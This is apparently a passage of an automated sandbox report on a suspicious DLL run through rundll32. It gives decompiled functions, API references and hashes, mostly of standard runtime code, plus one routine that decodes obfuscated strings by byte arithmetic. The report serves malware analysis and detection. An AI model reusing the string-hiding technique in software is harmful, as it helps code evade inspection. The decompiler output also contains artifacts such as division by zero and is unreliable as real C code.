                                                      0x6e7782eb
                                                      0x6e7782f5
                                                      0x6e7782fb
                                                      0x6e778300
                                                      0x6e778309
                                                      0x6e77830e
                                                      0x6e778313
                                                      0x6e77831b
                                                      0x6e778329
                                                      0x6e778337
                                                      0x6e77833f
                                                      0x6e778345
                                                      0x6e778348
                                                      0x6e77834e
                                                      0x6e778351
                                                      0x6e778352
                                                      0x6e778391
                                                      0x6e778391
                                                      0x6e778394
                                                      0x6e77839a
                                                      0x6e77839d
                                                      0x00000000
                                                      0x6e77839d
                                                      0x6e778300
                                                      0x6e7782dd
                                                      0x00000000
                                                      0x6e7783a2
                                                      0x6e77826c
                                                      0x6e7782bf
                                                      0x6e7782bf
                                                      0x6e7782c4
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778275
                                                      0x6e77827a
                                                      0x6e778288
                                                      0x6e778294
                                                      0x6e778298
                                                      0x6e7782a0
                                                      0x6e7782a6
                                                      0x6e7782ab
                                                      0x6e7782af
                                                      0x6e7782b3
                                                      0x6e7782b9
                                                      0x6e7782bc
                                                      0x6e7782bc
                                                      0x6e7782c6
                                                      0x6e7783aa
                                                      0x6e7783b1

                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,766F14B9,00000001,00000000), ref: 6E778246
                                                      • lstrlenA.KERNEL32(00000000), ref: 6E77824E
                                                      • StrStrA.SHLWAPI(?,00000000), ref: 6E77825E
                                                      • StrStrA.SHLWAPI(?,?), ref: 6E7782B3
                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 6E7782EE
                                                      • HeapReAlloc.KERNEL32(00000000,?,?), ref: 6E7782F5
                                                      • StrStrA.SHLWAPI(?,?), ref: 6E778394
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heaplstrlen$AllocProcess
                                                      • String ID:
                                                      • API String ID: 188504188-0
                                                      • Opcode ID: 1a4648f55b839fb9b32946e0896c2fe254d76efba5ac2944cecde36cbc1289cc
                                                      • Instruction ID: f898991aa409427c7d59758892dad2e628ec9457b4b7e5d364a059f47ff90cb0
                                                      • Opcode Fuzzy Hash: 1a4648f55b839fb9b32946e0896c2fe254d76efba5ac2944cecde36cbc1289cc
                                                      • Instruction Fuzzy Hash: 2351F975D00119EFDF11CFE8CD84AAEBBB9EF49304F1480A9E915AB315D734A912CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F4ED8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 6E7F4F18
                                                      • _free.LIBCMT ref: 6E7F4FE3
                                                      • _free.LIBCMT ref: 6E7F4FED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$x+$
                                                      • API String ID: 2506810119-418747824
                                                      • Opcode ID: 96ef0285aa45cfdb72e820ad385a6ba10ae9555f0524cf1b27e287e3f2b8ffc2
                                                      • Instruction ID: a3f78a5a6e6203292e7be7667bf4ef3791221b9819d3fae294dd046b449f8b38
                                                      • Opcode Fuzzy Hash: 96ef0285aa45cfdb72e820ad385a6ba10ae9555f0524cf1b27e287e3f2b8ffc2
                                                      • Instruction Fuzzy Hash: E93180B1A04609EFDB51CFD9CA84D9EBBFCEF86315F144066E40897320EB749A42DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77FAAB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77FAAB(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6E78053F(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6E78053F(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6E77D565(GetLastError());
									_t17 =  *((intOrPtr*)(E6E77D59B(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6E77FB72(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6E77D565(GetLastError());
						_t17 =  *((intOrPtr*)(E6E77D59B(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6E77FB72(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6E77FB99(_a8);
				return 0;
			}









                                                      0x6e77fab1
                                                      0x6e77fab6
                                                      0x6e77faca
                                                      0x6e77facd
                                                      0x6e77faff
                                                      0x6e77fb07
                                                      0x6e77fb09
                                                      0x6e77fb22
                                                      0x6e77fb25
                                                      0x6e77fb28
                                                      0x6e77fb36
                                                      0x6e77fb45
                                                      0x6e77fb4d
                                                      0x6e77fb4f
                                                      0x6e77fb68
                                                      0x6e77fb6b
                                                      0x6e77fb6b
                                                      0x6e77fb51
                                                      0x6e77fb58
                                                      0x6e77fb63
                                                      0x6e77fb63
                                                      0x6e77fb6d
                                                      0x6e77fb6e
                                                      0x00000000
                                                      0x6e77fb6e
                                                      0x6e77fb2d
                                                      0x6e77fb32
                                                      0x6e77fb34
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77fb34
                                                      0x6e77fb12
                                                      0x6e77fb1d
                                                      0x00000000
                                                      0x6e77fb1d
                                                      0x6e77facf
                                                      0x6e77fad2
                                                      0x6e77fad5
                                                      0x6e77fae8
                                                      0x6e77faeb
                                                      0x6e77faed
                                                      0x6e77faef
                                                      0x00000000
                                                      0x6e77faef
                                                      0x6e77fadb
                                                      0x6e77fae0
                                                      0x6e77fae2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77fae2
                                                      0x6e77fabb
                                                      0x00000000

                                                      Strings
                                                      • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E77FAB0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                      • API String ID: 0-2837366778
                                                      • Opcode ID: f3e7747a4c7f6e97973fd17d181a38f3d52f95d3719ee7223c44c0081d8643ba
                                                      • Instruction ID: ea6ae7ea770329c0add1d6a64abfc53d5de39de1a632dde539a9fab640db29ac
                                                      • Opcode Fuzzy Hash: f3e7747a4c7f6e97973fd17d181a38f3d52f95d3719ee7223c44c0081d8643ba
                                                      • Instruction Fuzzy Hash: DD21AC71614209AFAF348EF59FA4C9B7BADEE4636C7204925F91586170E731EC008BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77C6A1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 25%
                                                      			E6E77C6A1(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6e785148(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                                      0x6e77c6a7
                                                      0x6e77c6ab
                                                      0x6e77c6b6
                                                      0x6e77c6be
                                                      0x6e77c6c9
                                                      0x6e77c6cf
                                                      0x6e77c6d3
                                                      0x6e77c6da
                                                      0x6e77c6e0
                                                      0x6e77c6e0
                                                      0x6e77c6e2
                                                      0x6e77c6e7
                                                      0x00000000
                                                      0x6e77c6ec
                                                      0x6e77c6f3

                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E77C653,?,?,6E77C61B,?,00000001,?), ref: 6E77C6B6
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,6E77C653,?,?,6E77C61B,?,00000001,?), ref: 6E77C6C9
                                                      • FreeLibrary.KERNEL32(00000000,?,?,6E77C653,?,?,6E77C61B,?,00000001,?), ref: 6E77C6EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: a13a1f70160cfd7bd904caf77036e0f50daca6080d6f04a2be43ac1ff0ef0439
                                                      • Instruction ID: 261d0585bd4d72595c8f8fabe6ded1d12e33f6513b8bc1563369219f01a62fb5
                                                      • Opcode Fuzzy Hash: a13a1f70160cfd7bd904caf77036e0f50daca6080d6f04a2be43ac1ff0ef0439
                                                      • Instruction Fuzzy Hash: DEF0823050151AFBDF119BA0EE19B9F7B7DEB06756F204070A406E9160CB708F00DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7B6650, Relevance: 7.8, APIs: 5, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Tolower.LIBCPMT ref: 6E7B66A1
                                                      • __Tolower.LIBCPMT ref: 6E7B66CE
                                                      • __Tolower.LIBCPMT ref: 6E7B67BD
                                                        • Part of subcall function 6E7BDD24: ___crtLCMapStringA.LIBCPMT ref: 6E7BDDFB
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6E7B692A
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 6E7B692F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Tolower$Concurrency::cancel_current_task$String___crt
                                                      • String ID:
                                                      • API String ID: 3933662966-0
                                                      • Opcode ID: 230d1464c559c26b31a559e257e9af810f4671bd9ec39f4dd61bb36079ba0099
                                                      • Instruction ID: b9d4c4292ca767eac46c39f937b8b450b307c09ef93460ca252cdd71b0cd02b5
                                                      • Opcode Fuzzy Hash: 230d1464c559c26b31a559e257e9af810f4671bd9ec39f4dd61bb36079ba0099
                                                      • Instruction Fuzzy Hash: 02A1C2B5914606DFCB14CF98C540A99BBF5FF58310F10896EE9A99B750E730EA40CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FFF66, Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76aea5fa0192ab6e3cd4679824e50876c1680b9cb93fca0a4200b5b3ace02665
                                                      • Instruction ID: cdf276d8da61ff26383aad6b905e4178f363d06b05a7f28290e04c0445f3c666
                                                      • Opcode Fuzzy Hash: 76aea5fa0192ab6e3cd4679824e50876c1680b9cb93fca0a4200b5b3ace02665
                                                      • Instruction Fuzzy Hash: A371703190525B9FDB11CFD9CC94AAFBB79EF46360F100E29E824672D0E7718941CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F5E1F, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: da0f838a32ec469e2682da4c63c1c7008645e885f7f8e5a061283df7cac1ad8b
                                                      • Instruction ID: 4dd0aef0053819f0ddf34bfec923d6665587802004dc8fbd4225f298723140d9
                                                      • Opcode Fuzzy Hash: da0f838a32ec469e2682da4c63c1c7008645e885f7f8e5a061283df7cac1ad8b
                                                      • Instruction Fuzzy Hash: F741D732A00200DFCB14CFB8DA84A9AB7F5EF85314F1586A9E515EB355DB31ED02CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7A17E0, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7A1814
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7A1834
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7A185C
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7A1947
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7A1979
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                      • String ID:
                                                      • API String ID: 459529453-0
                                                      • Opcode ID: a967e73aa4f45c60af5aae7405917d5b1fcfb5b6381d966e590c7d14f6ca7ce5
                                                      • Instruction ID: d23dcf3327446bea05bf5c0d0ca08d1f6f72c0d4f9266128373c7e5e2d876232
                                                      • Opcode Fuzzy Hash: a967e73aa4f45c60af5aae7405917d5b1fcfb5b6381d966e590c7d14f6ca7ce5
                                                      • Instruction Fuzzy Hash: 3951E1B0904205DFEB10CFD8C64479EBBB8EF01324F1446A9D959AB3A1D771AA09CBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7A1630, Relevance: 7.6, APIs: 5, Instructions: 125COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7A1664
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7A1684
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7A16AC
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7A178D
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7A17BF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                      • String ID:
                                                      • API String ID: 459529453-0
                                                      • Opcode ID: 5209045b8227da9828190a7a379882b9e704d79d242916e1acb64a5fb6cc9df1
                                                      • Instruction ID: 3d87951cc437a6ffff6c502c0be16e316162806fc90088253ddc44e8620c21d5
                                                      • Opcode Fuzzy Hash: 5209045b8227da9828190a7a379882b9e704d79d242916e1acb64a5fb6cc9df1
                                                      • Instruction Fuzzy Hash: 6C51DFB0904205DFEB11CFD8C644BAEBBB4EF01314F148669D959AB3A1DB71AA09CFC1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E774B9D, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 114stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E6E774B9D(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, int* _a8) {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				CHAR* _v20;
				void* __ebp;
				CHAR* _t61;
				void* _t63;
				void* _t69;
				int _t70;
				char _t89;
				void* _t99;
				void* _t102;
				void* _t109;
				void* _t110;
				CHAR* _t112;
				signed int _t113;
				char _t114;
				void* _t115;

				_t109 = __edi;
				_t3 = E6E77111C() + 0x24; // 0x24
				_t61 = E6E7746B4(_t3, _t109, __ecx + __edx, _a4);
				_t112 = _t61;
				_v20 = _t61;
				if(_t112 == 0) {
					return 0;
				}
				_v8 = 0x70;
				_v7 = 0x3a;
				_t89 = 0;
				_push(_t109);
				_v6 = 0;
				_t63 = E6E773D05( &_v8);
				_t10 = E6E77111C() + 0x24; // 0x24
				_t110 = E6E774733(_t10, _t109, _t112, _t63);
				if(_t110 == 0) {
					L7:
					_v16 = 0x3f;
					_v15 = 0xe;
					_v14 = 0x14;
					_v13 = _t89;
					if(_v13 != 0) {
						L11:
						_t57 = E6E77111C() + 0x24; // 0x24
						_t69 = E6E774733(_t57, _t110, _t112,  &_v16);
						if(_t69 == 0) {
							_t70 = lstrlenA(_t112);
						} else {
							_t70 = _t69 - _t112;
						}
						 *_a8 = _t70;
						return _t112;
					}
					_t113 = 0x7f;
					do {
						_t99 = 0x14;
						asm("cdq");
						asm("cdq");
						 *(_t115 + _t89 - 0xc) = (_t113 + (_t99 - ( *(_t115 + _t89 - 0xc) & 0x000000ff)) * 0x2c % _t113) % _t113;
						_t89 = _t89 + 1;
					} while (_t89 < 3);
					_t112 = _v20;
					_v13 = 1;
					goto L11;
				}
				_v12 = 0x54;
				_v11 = 5;
				_v10 = 0x19;
				_v9 = 0;
				if(_v9 != 0) {
					L6:
					_t32 = E6E77111C() + 0x24; // 0x24
					_t112 = _t110 + E6E7747AE(_t32, _t110, _t110,  &_v12);
					_v20 = _t112;
					goto L7;
				}
				_push(0x7f);
				_t114 = 0;
				do {
					_t102 = 0x19;
					asm("cdq");
					asm("cdq");
					 *(_t115 + _t114 - 8) = (0 + (_t102 - ( *(_t115 + _t114 - 8) & 0x000000ff)) * 0x1b % 0) % 0;
					_t114 = _t114 + 1;
				} while (_t114 < 3);
				_v9 = 1;
				_t89 = 0;
				goto L6;
			}





























                                                      0x6e774b9d
                                                      0x6e774bb0
                                                      0x6e774bb3
                                                      0x6e774bb8
                                                      0x6e774bba
                                                      0x6e774bbf
                                                      0x00000000
                                                      0x6e774cc0
                                                      0x6e774bc5
                                                      0x6e774bc9
                                                      0x6e774bd1
                                                      0x6e774bd6
                                                      0x6e774bd7
                                                      0x6e774bda
                                                      0x6e774be6
                                                      0x6e774bee
                                                      0x6e774bf2
                                                      0x6e774c50
                                                      0x6e774c50
                                                      0x6e774c54
                                                      0x6e774c58
                                                      0x6e774c5f
                                                      0x6e774c66
                                                      0x6e774c94
                                                      0x6e774c9e
                                                      0x6e774ca1
                                                      0x6e774caa
                                                      0x6e774cb1
                                                      0x6e774cac
                                                      0x6e774cac
                                                      0x6e774cac
                                                      0x6e774cba
                                                      0x00000000
                                                      0x6e774cbc
                                                      0x6e774c6a
                                                      0x6e774c6b
                                                      0x6e774c74
                                                      0x6e774c7a
                                                      0x6e774c80
                                                      0x6e774c83
                                                      0x6e774c87
                                                      0x6e774c88
                                                      0x6e774c8d
                                                      0x6e774c90
                                                      0x00000000
                                                      0x6e774c90
                                                      0x6e774bf4
                                                      0x6e774bf8
                                                      0x6e774bfc
                                                      0x6e774c03
                                                      0x6e774c09
                                                      0x6e774c38
                                                      0x6e774c42
                                                      0x6e774c4a
                                                      0x6e774c4d
                                                      0x00000000
                                                      0x6e774c4d
                                                      0x6e774c0b
                                                      0x6e774c0d
                                                      0x6e774c10
                                                      0x6e774c19
                                                      0x6e774c1f
                                                      0x6e774c25
                                                      0x6e774c28
                                                      0x6e774c2c
                                                      0x6e774c2d
                                                      0x6e774c32
                                                      0x6e774c36
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,0000007F,00000000,0000001E,?), ref: 6E774CB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3lstrlen
                                                      • String ID: :$?$T$p
                                                      • API String ID: 3073243474-3409666954
                                                      • Opcode ID: ef3e35b1bedc5394eed644ed35fdaeffa6fac2d45fbf664b8d22d175041758f9
                                                      • Instruction ID: c390712eb33492026414ec0ddcc256241668cbf7cbfac1ec69bf3a91e5b358d6
                                                      • Opcode Fuzzy Hash: ef3e35b1bedc5394eed644ed35fdaeffa6fac2d45fbf664b8d22d175041758f9
                                                      • Instruction Fuzzy Hash: CC416D35908299AEDF12CFF99A547EDFFF85F16304F0444E9C8409B262E7B48609D7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2F56, Relevance: 7.6, APIs: 5, Instructions: 55COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2F5D
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2F67
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2FB8
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2FD8
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2FF6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: f78af7f49415aed58e3071d01beb8b93e937e4cd5c27fa619de2d9771cadcd99
                                                      • Instruction ID: f05045e1d3627780bf9c5a61c9179bc79a818370a204398d9863745d553f6d7f
                                                      • Opcode Fuzzy Hash: f78af7f49415aed58e3071d01beb8b93e937e4cd5c27fa619de2d9771cadcd99
                                                      • Instruction Fuzzy Hash: 2011A3318006199FCF05DFE4DA58AEE77BDAF89724F140C19E414AB2B0DF74AA05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2FFD, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C3004
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C300E
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C305F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C307F
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C309D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: e7b54d28069b5a3035f08923ee4adc71e09bcb71119d1af4a553c5afa32b2e9c
                                                      • Instruction ID: 657182a179a8b74d21d0b56e7f622d024e8efc6801ee836509b4724e6500e142
                                                      • Opcode Fuzzy Hash: e7b54d28069b5a3035f08923ee4adc71e09bcb71119d1af4a553c5afa32b2e9c
                                                      • Instruction Fuzzy Hash: E4119172800219DBCF01EFE4DA58AFE77BDAF85714F140819D4146B2B0DF74AA05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7CFFCB, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7CFFD2
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7CFFDC
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7D002D
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D004D
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7D006B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: e65d159489b208e32eda3dafab3c78b2d4f2a08252c8118df39e97a459887d98
                                                      • Instruction ID: 7647df2252a62b808b978c30786ebb473c63bc3e874765a8e53c751d88d8dced
                                                      • Opcode Fuzzy Hash: e65d159489b208e32eda3dafab3c78b2d4f2a08252c8118df39e97a459887d98
                                                      • Instruction Fuzzy Hash: 3411C271801219DBCF01DFE4DA58AFD77BEAF85324F110818E414AB2B0EF789A09DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2C18, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2C1F
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2C29
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2C7A
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2C9A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2CB8
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
